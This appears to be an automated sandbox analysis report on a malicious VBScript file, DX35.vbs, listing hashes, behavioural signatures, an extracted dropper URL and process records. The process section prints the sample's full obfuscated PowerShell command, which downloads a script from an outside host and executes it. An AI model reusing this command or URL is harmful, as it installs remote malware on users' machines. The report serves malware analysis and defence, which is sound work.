Analysis
-
max time kernel
7s -
max time network
11s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
02-05-2021 05:27
Static task
static1
Behavioral task
behavioral1
Sample
DX35.vbs
Resource
win7v20210410
0 signatures
0 seconds
General
-
Target
DX35.vbs
-
Size
978B
-
MD5
bcbad24347e93a0508784f3b4301b7eb
-
SHA1
e53eebe440a13db0d356aba83a7e7163dcb5b09f
-
SHA256
a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61
-
SHA512
3bfd946bcd9a06d15bb69a938865763d35dde92992d4cfb9b5065e5397803bf486eb57f2bdd83d59badea7afbddc45ce0920f139fe11107688e2bb781ce4a98b
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://nyc002.hawkhost.com/~mazenne1/ITR/ls.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1504 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1504 powershell.exe 1504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1504 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 788 wrote to memory of 1504 788 WScript.exe powershell.exe PID 788 wrote to memory of 1504 788 WScript.exe powershell.exe PID 788 wrote to memory of 1504 788 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DX35.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).INVOKE((('https://nyc002.hawkhost.com/~mazenne1/ITR/ls.txt'))))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/788-60-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmpFilesize
8KB
-
memory/1504-61-0x0000000000000000-mapping.dmp
-
memory/1504-63-0x0000000002300000-0x0000000002301000-memory.dmpFilesize
4KB
-
memory/1504-64-0x000000001ACE0000-0x000000001ACE1000-memory.dmpFilesize
4KB
-
memory/1504-65-0x0000000002340000-0x0000000002341000-memory.dmpFilesize
4KB
-
memory/1504-66-0x000000001AC60000-0x000000001AC62000-memory.dmpFilesize
8KB
-
memory/1504-67-0x000000001AC64000-0x000000001AC66000-memory.dmpFilesize
8KB
-
memory/1504-68-0x0000000001EB0000-0x0000000001EB1000-memory.dmpFilesize
4KB
-
memory/1504-69-0x000000001C400000-0x000000001C401000-memory.dmpFilesize
4KB